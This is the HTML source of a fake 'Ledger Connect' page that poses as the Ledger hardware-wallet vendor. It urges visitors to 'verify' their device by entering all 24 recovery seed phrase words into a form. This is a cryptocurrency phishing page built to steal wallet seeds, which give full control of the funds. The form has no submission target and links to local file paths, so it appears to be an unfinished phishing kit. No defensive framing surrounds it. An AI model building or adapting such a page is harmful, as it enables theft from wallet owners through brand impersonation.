<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Ledger Connect</title>
	<link rel="stylesheet" href="assets/main.css">
	 <link rel="stylesheet" type="text/css" href="npm/instantsearch.js%402.10.4/dist/instantsearch.min.css">
        <link rel="stylesheet" type="text/css" href="npm/instantsearch.js%402.10.4/dist/instantsearch-theme-algolia.min.css">
	<link href="font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
	<link rel="stylesheet" type="text/css" href="C:\Users\HP\Desktop\website\bootstrap\BT\bootstrap-5.0.2-dist\css\bootstrap.css">
	<style type="text/css">
		body{
			box-sizing: border-box;
			margin: 0;
			padding: 0;
			background-color: black;
		}

		

		.main{
			display: grid;
			grid-template-columns: 300px auto;
			gap: 2px;
			margin: 30px;
		}

		.sub1 img{
			height:100%;
			width: 100%;
		}

		.sub3 input{
			padding: 15px;
			margin: 5px;
		}

		.sub2{
			color: white;
			margin-top: 20px;
		}

		.sub2 h2{
			font-family: sans-serif;
			font-weight: bolder;
		}

		.sub2 p{
			font-family: monospace;
			font-weight: bold;
		}

		button{
			border-style: solid;
			border-radius: 10px;
			height: 28px;
			width: 90px;
		}

		button:hover{
			color: purple;
			font-weight: bold;
		}

		
		@media screen and (max-width: 800px){
			
			.sub1 img{
				height: 0px;
				width: 0px;
			}

			.main{
			display: grid;
			grid-template-columns: 0px auto;
			gap: 1px;
			margin: 30px;
		}


		}


	</style>

</head>
<body>

<div class="main">
	<div class="sub1">
		<img src="download1.jpg">
	</div>

	<div class="sub2">
		
	<h2>
		VERIFY SEED PHRASE OF YOUR DEVICE
	</h2>
	<br><br>
	<p>
		Enter your Recovery Seed Phrase Words to Import and Download Your Wallet App.
	</p>
	<p>
		**Ledger does not keep a copy of your recovery phrase.
	</p>
	<p>
		**ENTER 24 SEED PHRASE WORDS CORRECTLY TO START LEDGER LIVE.
	</p>

	<div class="sub3">
		<form>
			<fieldset>
			<label>
			24 Words
			</label>
			<br><br>
			
			<input type="1." name="" placeholder="1. word"> 
			<input type="2." name="" placeholder="2. word">
			<input type="2." name="" placeholder="3. word">
			<input type="2." name="" placeholder="4. word">
			<input type="2." name="" placeholder="5. word">
			<input type="2." name="" placeholder="6. word">
			<input type="2." name="" placeholder="7. word">
			<input type="2." name="" placeholder="8. word">
			<input type="2." name="" placeholder="9. word">
			<input type="2." name="" placeholder="10. word">
			<input type="2." name="" placeholder="11. word">
			<input type="2." name="" placeholder="12. word">
			<input type="2." name="" placeholder="13. word">
			<input type="2." name="" placeholder="14. word">
			<input type="2." name="" placeholder="15. word">
			<input type="2." name="" placeholder="16. word">
			<input type="2." name="" placeholder="17. word">
			<input type="2." name="" placeholder="18. word">
			<input type="2." name="" placeholder="19. word">
			<input type="2." name="" placeholder="20. word">
			<input type="2." name="" placeholder="21. word">
			<input type="2." name="" placeholder="22. word">
			<input type="2." name="" placeholder="23. word">
			<input type="2." name="" placeholder="24. word">
		</fieldset>
		<br>
		<button id="submit" type="submit" name="submit" value="submit" 
        >Submit
        </button>
		</form>
	</div>

</div>

</div>


<script type="text/javascript" src="C:\Users\HP\Desktop\website\transport express\bootstrap-5.0.2-dist\js\bootstrap.bundle.min.js"></script>
</body>
</html>